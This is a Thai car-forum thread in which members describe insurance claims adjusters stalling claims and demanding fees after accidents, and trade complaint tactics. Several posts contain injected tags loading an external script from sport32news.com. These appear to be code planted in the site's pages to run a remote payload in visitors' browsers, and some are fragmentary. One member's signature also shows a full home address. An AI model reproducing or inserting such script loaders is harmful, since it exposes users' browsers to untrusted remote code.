ตอบ
N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 26 สิงหา 2013 16:58 - เอามาเตือนภัย+ประกันเล่นแง่
แจ้งเป็นอุทาหรณ์ครับ วันที่24เวลาตี3กว่า ๆ ผมได้รับโทรศัพท์จากพี่ที่อยู่บ้านติดกันว่าโดนรถพ่วงชนอยู่ในปั๊มมาช่วยดูหน่อย ไม่ถามอะไรมากจึงแหกขี้ตาตื่นขับรถไปหาเลย หุ หุ (ยังสงสัยอยู่ว่าชนยังไงฟะในปั๊ม)พอไปถึง..อย่างที่เห็นในรูปครับ ล้อหางพ่วงหน้าซ้ายเหยียบขึ้นมาบนกระโปรงหน้า Civic และรถเก๋งหนีตายถอยออกมา เพราะขณะที่เหยียบรถพ่วงยังไม่เบรค
ลักษณะที่เกิดเหตุ
รถเก๋งเติมน้ำมันอยู่คนละช่องกับรถพ่วง พอเติมเสร็จก็ออกตัวพร้อม ๆ กันแทนที่รถพ่วงจะตรงไปเพื่ออกถนนใหญ่กลับหักซ้ายเพื่อตีโค้งเข้ามาในปั๊ม (เพื่อหาที่จอดอาบน้ำ)
ช่วงนั้นรถเก๋งก็ออกตัวมาพอดี ไอ้นี่ก็ไม่ได้ดูว่าเค้าเป็นรถพ่วงคิดว่าเป็นรถ 10 ธรรมดาถอยออกไม่ทันโดนซะ
...สุดท้าย.. รถพ่วงตอบแบบแมนมาก "ผมขอโทษพี่ผมผิดเต็ม ๆ ไม่ทันได้มอง เดี๋ยวผมเรียกประกันมาซ่อมให้"
แต่พอประกันมาครับ.....มันบอกว่า "รถพี่ไม่ได้อยู่ตรงจุดเกิดเหตุอ่ะ พี่เลื่อนออกมาทำไมแบบนี้ทางผมรับผิดชอบไม่ได้หรอก...(มันพูดก่อนที่ผมจะถามถึง)"
พี่เจ้าของรถบอก ถ้าไม่ถอยออกมาคนในรถก็ตายสิเพราะรถพ่วงไม่ได้หยุด
จนผมมาถึงและถามสาเหตุ เจ้ารถพ่วงก็ตอบคำเดิมแหล่ะ ผมยอมรับผิดครับ แต่ไอ้ประกันนี่สิ
"แหมพี่ต่างคนต่างพุ่งออกมาอ่ะ (โถไอ้ฟาย ไอ้ส้วนเตียนเอ้ย ผมด่าในใจนะ)"
ผมจึงถามมันว่า "นี่คุณ คุณก็เห็นว่าวิถีของรถพ่วงอยู่แล้ว มันไม่ใช่ที่กลับรถคุณก็เห็น และถ้าน้องเค้าไม่ถอยออกมาก็ตายกันหมด"
แล้วมันก็เงียบ  ผมจึงบอกเจ้าของรถว่า "ไม่เป็นไรพี่โทรหาตำรวจ ขอชื่อเจ้าหน้าที่ประกัน เบอร์โทร ถ่ายรูปไว้ด้วย แล้วเดี๋ยวผมจะคุยเรื่องนี้กับเพื่อนที่เป็นสารวัต จะเอาชีวิตการทำงานมาเสี่ยงก็ตามใจ" สักพักมันเดินไปคุยกะเจ้ารถพ่วง แล้วก็เดินมาทำหน้ากวนตรีนแล้วก็เขียนใบเคลมให้
"เดี๋ยวผมให้รถมาลากไปที่อู่นะครับ พรุ่งนี้พี่เอาเข้าไปที่อู่เดี๋ยวผมออกใบเคลมให้ครับ"
ประเด็นคือมันต้องการให้รถเก๋งจ่ายให้มัน 2 พันค่าเสียเวลา

ยังไงซะสิ่งที่น่ากลัวว่ารถใหญ่ ๆ จะกระทำเช่นนี้ก็กลางคืนล่ะครับ ระวัง ไ หน่อยนะครับ

Attached File :
เอามาเตือนภัย+ประกันเล่นแง่
Attached File :
เอามาเตือนภัย+ประกันเล่นแง่
เห็นรอยล้อรถไหมครับอยู่บนกระโปรงน่ะ
เห็นรอยล้อรถไหมครับอยู่บนกระโปรงน่ะ
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 26 สิงหา 2013 17:21 - เอามาเตือนภัย+ประกันเล่นแง่
ประกันไรครับ จะได้ไม่ทำ
ได้รับคำขอบคุณจาก: N_J Civic 
N_J Civic

ครอบครัว ES
ครอบครัว ES

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 26 สิงหา 2013 17:35 - เอามาเตือนภัย+ประกันเล่นแง่
boymac พิมพ์ว่า:
ประกันไรครับ จะได้ไม่ทำ

สินม่านคงครับ

ได้รับคำขอบคุณจาก: bangkean_tum  jagkrapongVilaikaew  BULLDOG 
Memory11

ชื่อเล่น: หนึ่ง

เข้าร่วม: 06 พฤษภาคม 2013
ตอบ: 1892

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1457
ให้คำขอบคุณ: 2074

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 26 สิงหา 2013 17:48 - เอามาเตือนภัย+ประกันเล่นแง่
ประกัน...ฮึ่ม !!!
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 26 สิงหา 2013 18:03 - เอามาเตือนภัย+ประกันเล่นแง่
แจ้ง คปภ ได้ครับ เดี๋ยวคปภ ชี้ขาดทีหลังอีกที 
chai04

เข้าร่วม: 11 กุมภา 2010
ตอบ: 65

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 5
จันทร์, 26 สิงหา 2013 18:20 - เอามาเตือนภัย+ประกันเล่นแง่
ไม่ควรยอมเสียเงินครับเพราะเราไม่ผิด ของผมเองก็โดนเมื่อไม่กี่วันคู่กรณีชนแล้วหนี โทรไปหาประกันเจ้าเดียวกันบอกว่าเราต้องแจ้งความ ผมก็ไปแจ้งความ พอเอาใบแจ้งความกลับมาให้ว่าไม่ได้ต้องเสียอีกสองพัน เพราะคู่กรณีหนีจับไม่ได้ เลยแจ้งไปที่ตัวแทนประกันครับ เขาเดินเรื่องให้โทรไปหาผู้จัดการเขต แล้วก็ทำหนังสือร้องเรียนไปที่ส่วนกลาง สรุปคือเราไม่ต้องเสียครับ แนะนำโทรไปร้องเรียนที่บริษัทเลยครับ ตัวแทนที่ผมทำเขาบอกว่าพวกนี้มันกินเปล่าครับ คนที่เสียคือคนที่ไม่รู้ ยอมๆ มันเพื่อให้จบลงง่ายๆ
ได้รับคำขอบคุณจาก: N_J Civic  es330  jagkrapongVilaikaew 
Mundo

ชื่อเล่น: ธี

เข้าร่วม: 02 พฤษภาคม 2012
ตอบ: 881

Guru ES
Guru ES

ได้รับคำขอบคุณ: 720
ให้คำขอบคุณ: 490

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 26 สิงหา 2013 19:50 - เอามาเตือนภัย+ประกันเล่นแง่
chai04 พิมพ์ว่า:
ไม่ควรยอมเสียเงินครับเพราะเราไม่ผิด ของผมเองก็โดนเมื่อไม่กี่วันคู่กรณีชนแล้วหนี โทรไปหาประกันเจ้าเดียวกันบอกว่าเราต้องแจ้งความ ผมก็ไปแจ้งความ พอเอาใบแจ้งความกลับมาให้ว่าไม่ได้ต้องเสียอีกสองพัน เพราะคู่กรณีหนีจับไม่ได้ เลยแจ้งไปที่ตัวแทนประกันครับ เขาเดินเรื่องให้โทรไปหาผู้จัดการเขต แล้วก็ทำหนังสือร้องเรียนไปที่ส่วนกลาง สรุปคือเราไม่ต้องเสียครับ แนะนำโทรไปร้องเรียนที่บริษัทเลยครับ ตัวแทนที่ผมทำเขาบอกว่าพวกนี้มันกินเปล่าครับ คนที่เสียคือคนที่ไม่รู้ ยอมๆ มันเพื่อให้จบลงง่ายๆ

ประกันชั้นอะไรครับ? 
chai04

เข้าร่วม: 11 กุมภา 2010
ตอบ: 65

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 5
จันทร์, 26 สิงหา 2013 21:15 - เอามาเตือนภัย+ประกันเล่นแง่
Mundo พิมพ์ว่า:
chai04 พิมพ์ว่า:

ประกันชั้นอะไรครับ? 

ประกันชั้นหนึ่งครับ พวกนี้จะเล่นแง่ ทางตัวแทนประกันยังแนะนำมาด้วยว่าถ้าเกิดเหตุแบบนี้ให้โทรหาตัวแทนที่ผมซื้อเลย เขาจะเคลียเองเมื่อมีปัญหา กรณีของผมเขาเล่าว่าทำหนังสือร้องเรียนไปด้วยและทางบริษัทจะต้องมีหนังสืออธิบายเหตุผลว่าทำไมทางพนักงานถึงปฏิเสธท่จะช่วยเหลือ แถมเรียกเงินเพื่อออกใบเคลมอีกด้วย

N_J Civic

ครอบครัว ES
ครอบครัว ES

จันทร์, 26 สิงหา 2013 22:12 - เอามาเตือนภัย+ประกันเล่นแง่
แบบเดียวกันเลยครับ
veerachai

ชื่อเล่น: ซี เมืองทอ

เข้าร่วม: 06 กุมภา 2012
ตอบ: 1344

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 590
ให้คำขอบคุณ: 1308

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 26 สิงหา 2013 23:08 - เอามาเตือนภัย+ประกันเล่นแง่
ความรู้ดีครับ คนเราหากินบนความทุกข์คนอื่น เงินเดือนมันก็ได้ยังมา เอาฟรีๆ อีกหรอ
Tam_Kanchanaburi

ชื่อเล่น: ตั้ม

เข้าร่วม: 26 กันยา 2012
ตอบ: 1025

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 352
ให้คำขอบคุณ: 4

สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 26 สิงหา 2013 23:13 - เอามาเตือนภัย+ประกันเล่นแง่
thammarong007

ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 27 สิงหา 2013 01:01 - เอามาเตือนภัย+ประกันเล่นแง่
บริษัทประกันผมว่ามันก็ไม่น่าคบสักที่หละครับ มันยากที่จะจริงใจกับใครๆทั้งสิ้น แม้แต่ลูกค้าของมันเอง เพราะมันเป็นผลประโยชน์ของบริษัทมัน
ได้รับคำขอบคุณจาก: N_J Civic  nayyai1 
biwsa666

ชื่อเล่น: บิว

เข้าร่วม: 29 กรกฎา 2013
ตอบ: 27

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 0

ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 27 สิงหา 2013 01:14 - เอามาเตือนภัย+ประกันเล่นแง่
จะเอาเงินอย่างเดียว แย่มากๆ กรุงเทพประกันภัย ของเพื่อนผม มาที่จุดเกิดเหตุ ถ่ายรูป สอบถามความปลอดภัยของผู้ขับขี่ ออกใบเคลม เรียกรถยกให้ เจ้าของกลับบ้านอาบน้ำนอน ...
N_J Civic

ครอบครัว ES
ครอบครัว ES

อังคาร, 27 สิงหา 2013 07:12 - เอามาเตือนภัย+ประกันเล่นแง่
biwsa666 พิมพ์ว่า:
จะเอาเงินอย่างเดียว แย่มากๆ กรุงเทพประกันภัย ของเพื่อนผม มาที่จุดเกิดเหตุ ถ่ายรูป สอบถามความปลอดภัยของผู้ขับขี่ ออกใบเคลม เรียกรถยกให้ เจ้าของกลับบ้านอาบน้ำนอน ...

...

Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

อังคาร, 27 สิงหา 2013 08:56 - เอามาเตือนภัย+ประกันเล่นแง่
งานนี้ผมว่าไม่เกี่ยวกะบริษัทประกันหลอก ผมว่าเจ้าหน้าที่เคลมมันกวน... เองมากกว่า
Rachen

ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

อังคาร, 27 สิงหา 2013 13:04 - เอามาเตือนภัย+ประกันเล่นแง่
   เจอบ่อยประกัน หน้าส่วนเตียน เนี้ย แย่ๆ
N_J Civic

ครอบครัว ES
ครอบครัว ES

อังคาร, 27 สิงหา 2013 14:38 - เอามาเตือนภัย+ประกันเล่นแง่
Saka พิมพ์ว่า:
งานนี้ผมว่าไม่เกี่ยวกะบริษัทประกันหลอก ผมว่าเจ้าหน้าที่เคลมมันกวน... เองมากกว่า

ถูกต้องที่สุดครับ
Rachen พิมพ์ว่า:
   เจอบ่อยประกัน หน้าส่วนเตียน เนี้ย แย่ๆ

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ..

neverplus

ชื่อเล่น: วิน

เข้าร่วม: 01 กรกฎา 2013
ตอบ: 1591

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1061
ให้คำขอบคุณ: 185

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 27 สิงหา 2013 16:29 - เอามาเตือนภัย+ประกันเล่นแง่
พี่ที่ทำงานก็เคยเจอ เค้าขับมอไซด์บิ๊กไบท์อยู่เลนซ้ายมาไม่เร็วมาก

อยู่ดีๆแท๊กซี่มาตัดหน้าเพื่อรับผู้โดยสารเค้าล้ม (แต่ไม่เป็นไรมาก)

คราวนี้ประกันมา บอกว่า แท๊กซี่ไม่ผิด ไม่มีข้อหา ปาดหน้า 

รุ่นพี่บอกเดี่ยวจะเอารถใหญ่ไปตัดหน้ามันมั่ง (แกจดทะเบียนมอไซด์มันไว้)

แล้วก็จะบอกว่าไม่มีข้อหานี้ไม่ใช่หรอ 

สุดท้ายรุ่นพี่ผมก็เลยแจ้งความ เอาชื่อพนักงาน ไปแจ้งศูนย์ใหญ่

ก็ต้องมาขอโทษแล้วก็ออกใบเคลมให้ เห็นว่าทางศูนย์ก็ได้ให้พักงานไป"<script src="https://sport32news.com/civicesgroup.js">
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

อังคาร, 27 สิงหา 2013 21:20 - เอามาเตือนภัย+ประกันเล่นแง่
น่าจะไม่เกี่ยวกับบริษัทแล้วล่ะ เจ้าหน้าที่พนักงานล้วนๆ
army-mafia46

เข้าร่วม: 04 ตุลา 2011
ตอบ: 953

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 818
ให้คำขอบคุณ: 1088

สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 28 สิงหา 2013 23:43 - เอามาเตือนภัย+ประกันเล่นแง่
พวกนี้เห็นแต่ผลประโยชน์อย่างเดียว ต้องด่าให้เข็ด ต้องเจอคนจริงมันจะได้เข็ดครับ
army-mafia46

เข้าร่วม: 04 ตุลา 2011
ตอบ: 953

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 818
ให้คำขอบคุณ: 1088

สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 28 สิงหา 2013 23:53 - เอามาเตือนภัย+ประกันเล่นแง่
ผมเคยโดนมากับตัวเอง แต่ผมเป็นคู่กรณีกับทางฝ่ายประกัน(ของญี่ปุ่น) ผมขับbigbikeมาทางตรง ส่วนคู่กรณีสวนทางมาและจะเลี้ยวเข้าซอยทางฝั่งผม แต่ไม่ดูผมเลยจะเลี้ยวก็เลี้ยว ชนผมเต็มที่ตรงขาขวาหัก3ท่อน เอ็นหลังเท้าขาดเนื้อตรงหลังเท้าหายไป1ฝ่ามือ ผมเข้าออก รพ. 3รอบในเวลา 6 เดือน เนื่องจากแผลติดเชื้อ ผ่าตัดทั้งหมด5ครั้ง รู้ไหมครับประกันมันบอกผมว่าให้ 80,000 ผมเลยถามทำไมให้น้อยจัง มันเลยบอกผมว่าขนาดขาขาดมันยังให้ไม่ถึงแสนเลย ผมเลยบอกว่านั้นคุณยืนเรียงกันเลยผมขอชนหน่อยเดี๋ยวผมให้คนละ100,000 เอาไหม เจ้าหน้าที่คนนั้นเงียบเลยครับ
ได้รับคำขอบคุณจาก: Saka  N_J Civic  BULLDOG 
wangyu

ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 29 สิงหา 2013 13:43 - เอามาเตือนภัย+ประกันเล่นแง่
เป้นเงิน เป็นทองกันหมดเลยครับตอนนี้ครับ

anglo

ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ศุกร์, 30 สิงหา 2013 16:25 - เอามาเตือนภัย+ประกันเล่นแง่

ผมมองว่าต้องเกี่ยวครับ ถ้าไม่มีบริษัทประกัน ไอ้สันดานหมาพวกนั้นมันก็ทำอาชีพนี้ไม่ได้

เกี่ยวเพราะบริษัทไม่คัดกรองคนมาเป็นตัวแทนประกันเลยหรือไง

หรือไม่มีการฝึกอบรมเจ้าหน้าที่ หรือไม่มีกฎเหล็กที่ต้องปฏิบัติ พร้อมทั้งบทลงโทษในความผิดกรณีต่างๆ

สรุป คือ บริษัท ไม่ีมีมาตรฐานหรือเปล่า? มันชวนให้คิด ว่าเมิงจะเลี้ยงคนเลวๆ ชอบเอาเปรียบคนเดือดร้อนไว้เป็นพนักงานบริษัททำซากอะไร!!!

N_J Civic

ครอบครัว ES
ครอบครัว ES

ศุกร์, 30 สิงหา 2013 16:42 - เอามาเตือนภัย+ประกันเล่นแง่
anglo พิมพ์ว่า:

ผมมองว่าต้องเกี่ยวครับ ถ้าไม่มีบริษัทประกัน ไอ้สันดานหมาพวกนั้นมันก็ทำอาชีพนี้ไม่ได้

เกี่ยวเพราะบริษัทไม่คัดกรองคนมาเป็นตัวแทนประกันเลยหรือไง

หรือไม่มีการฝึกอบรมเจ้าหน้าที่ หรือไม่มีกฎเหล็กที่ต้องปฏิบัติ พร้อมทั้งบทลงโทษในความผิดกรณีต่างๆ

สรุป คือ บริษัท ไม่ีมีมาตรฐานหรือเปล่า? มันชวนให้คิด ว่าเมิงจะเลี้ยงคนเลวๆ ชอบเอาเปรียบคนเดือดร้อนไว้เป็นพนักงานบริษัททำซากอะไร!!!

..ถูกต้องครับ ควรจะมีการเอาจริงจังกับคนที่ไม่ซื่อต่อหน้าที่
Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ศุกร์, 30 สิงหา 2013 17:00 - เอามาเตือนภัย+ประกันเล่นแง่
N_J Civic พิมพ์ว่า:
anglo พิมพ์ว่า:

..ถูกต้องครับ ควรจะมีการเอาจริงจังกับคนที่ไม่ซื่อต่อหน้าที่

ผมว่าน่าจะคุมลำบาก เดี๋ยวนี้บริษัทประกันชอบลดต้นทุนไปจ้างบริษัทจ้างเคลม คนนึงวิ่งหลายบริษัทประกันเลย เจอบ่อย ๆ บางทีแจ้งเคลมผิดบริษัทประกัน แต่เจ้าหน้าที่คนเดิมก็ทำงานได้ <script src="https://sport32news.com/civicesgroup.js"></
แต่ถ้าหากมีการโทรเช็คว่าเจ้าหน้าที่เคลมเป็นอย่างไง ได้รับบริการที่ดีมั้ย เหมือนศูนย์โทรตามให้ไปเช็คระยะก็คงดี
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 31 สิงหา 2013 16:49 - เอามาเตือนภัย+ประกันเล่นแง่
จบเรื่องตามไปตบไอประกันคนนั้นสักชุดนึง 

น่าจะหายหงุดหงิดนะคร้าบบบท่าน จขกท.

เรื่องแบบนี้ต้องใช้กำลังตัดสินคับ จาได้สบายใจ

5555+ ขำๆนะค้าบบบบบ ^^"
Oo-kakachi-oO

ชื่อเล่น: จ๊อตครับ

เข้าร่วม: 02 มิถุนา 2010
ตอบ: 597

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1013
ให้คำขอบคุณ: 814

พุธ, 4 กันยา 2013 10:16 - เอามาเตือนภัย+ประกันเล่นแง่
กับเจ้าหน้าที่ประกันนี่ ผมก็เคยโดนนะ ตอนนั้นของผมชั้น 3 กำลังถอยออกจากโรงรถผมเลย แล้วก็มีรถคู่กรณีขับมาจอดตรงที่ผมถอยออกพอดี โครม!!! ในทันที ..... งงดิ อะไรว้ะ ขับมาแทบจะทั่วประเทศไม่เคยมีไร บทจะชน มาชนตรงที่จอดรถบ้านตัวเองซ้ะงั้น ทีนี้ คู้กรณีผมก็นั่งช๊อคเลย ส่วนอิแม่มันลงมาก็โวยใหญ่เลย หาว่าเราขับไม่ดู ขับไม่ระวัง #@$^&&*&^$^ %๒% เยอะ!!! แล้วเค้าก็เรียกประกันมา .... รอ มันมาแล้ว สินมั่นคง มาไวจริงๆ มาถึงก็กราดผมเลย "พี่ผิดเต็มๆ ถอยไม่ดูเลยเหรอ ลูกค้าผมกลัวตัวสั่นแล้ว เอางี้ ผมขอ 4500 จบเลย + ค่าทำขวัญ 500 จบง่ายๆแล้วกันนะพี่นะ ....." .... มึงลืมไปป่าว ว่านี่มันซอยบ้านกู ถิ่นกู ผมก็ อ่ะ สรุป ห้าพันนะ ... กูไม่จ่าย มึงเรียกตำรวจมา เรียกเลย กูมีกล้องวงจรปิด แล้วรถนี่อะไร ป้ายแดงนิ ซื้อศูนย์นี้ ผมมั่นใจเลยว่าเป็นประกันระบุบุคคล แล้วที่สำคัญ 2ทุ่มกว่า มันใช่เรอะ ซอยบ้านผมนี่ โคตรสว่างเลยนะเว้ย เอาไงดี สรุป ผมเตะถ่วงจนเพื่อนผมมา(ทั้งประกันฝั่งผมทั้งตำรวจน่ะแหล่ะ) ยาวเลย ขอดูเอกสาร อีกฝ่ายก็อิดออด จะเล่นเรื่องป้ายแดง ยาก เพื่อนผมเสือกขับป้ายแดงมา จะเปิดกล้อง แม่ง หาว่าผมอาจจะตัดต่อ โพ่งดิ!!!! กูยืนเถียงกะมึงเกือยสองชั่วโมง จะเอาเวลาที่ไหนไปตัดต่อ ..... สรุป เปิดกล้อง เค้าเป็นฝ่ายพุ่งมาชนผม ... คดีพลิก !!!! สรุป แบบรำคาณโคตรๆแล้ว อ่ะ ต่างคนต่างซ่อม มึงไปทำของมึง กูทำของกู จบนะ 
.
.
.
และในเวลา 5 ทุ่มกว่าๆวันนั้นเอง ก็มีโทรศัพทย์มาข่มขู่ พลางขอค่าทำขวัญ ประมาณว่า กลัวการขับรถไปเลย กลัวรถมาก สั่นตลอด ..... สลัดผักเอ๊ย!!!!! เราก็นัดสถานที่เลย ว่าจะรับที่ไหน อินี่บอกให้โอนเข้าบัญชี ผมบอกไม่โอน มารับเงินจากมือเท่านั้น ... วางสายไปเลย วันรุ่งขึ้น ให้เพื่อนโทรไปเบอร์นั้น สรุป ไอ้ที่โทรมาขอค่าทำขวัญ ก็ไอ้คนที่เป็นประกันของคู่กรณีนั่นล่ะครับ หลังจากนั้นเหรอ . . . ผมไม่บอกหรอกว่ามันเจออะไรไปบ้างอ่ะ เหลืออดจริงๆ
Nack_Non

ชื่อเล่น: แน๊ก ชาลี

เข้าร่วม: 01 ธันวา 2011
ตอบ: 346

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 242
ให้คำขอบคุณ: 216

พุธ, 4 กันยา 2013 11:55 - เอามาเตือนภัย+ประกันเล่นแง่
เล็กๆน้อยๆก็ยังเอากันเนาะ

therawat

ชื่อเล่น: จิ

เข้าร่วม: 22 ธันวา 2011
ตอบ: 78

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 77

พุธ, 4 กันยา 2013 22:14 - เอามาเตือนภัย+ประกันเล่นแง่
โชคดีนะที่คนขับรถพ่วงยังยอมรับผิด ไปเจอบางคนมันกวนส้นน..รีนนน ฝุดๆ
Peepo

เข้าร่วม: 15 กรกฎา 2012
ตอบ: 243

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 34

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 กันยา 2013 22:32 - เอามาเตือนภัย+ประกันเล่นแง่
ผมเองโดนมา แล้ว เป็นฝ่ายถูก
ผม ประกันชั้น1 ของคุ้มภัย
คู่กรณี ประกันชั้น3+ ของ ไทยพาณิชย์สามัคคี
รถผมจอดอยู่ โดน แคมรี่ จูบตูด
พนักงานประกันผมอยู่ห่างจากจุดเกิดเหตุ 10กิโล แต่ให้คนอื่นมาซึ่งอยู่ห่างจากจุดเกิดเหตุ เกือบๆร้อยโล
รถชน9.00น. ประกันมาถึง 11.30น. รถยกมา 14.30น. (ประกันชั้น1ซะด้วย เจริญละ พี่น้อง)
หลังจากเอารถเอาอู่ซ่อม อู่บอกว่า พี่ช่วยเร่งเรื่องราคาเคลมรถ ให้ผมด้วยแล้วกันจะได้ซื้ออะไหล่ซ่อมให้ไวๆ
จะ3เดือนแล้วยังไปไม่ถึงไหนเลย คู่กรณีรถเสร็จแล้ว แถมประกันคู่กรณีก็โทรหาบ่อย แต่ประกันผม ไม่มีโทรมา ถ้าไม่โทรไป
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.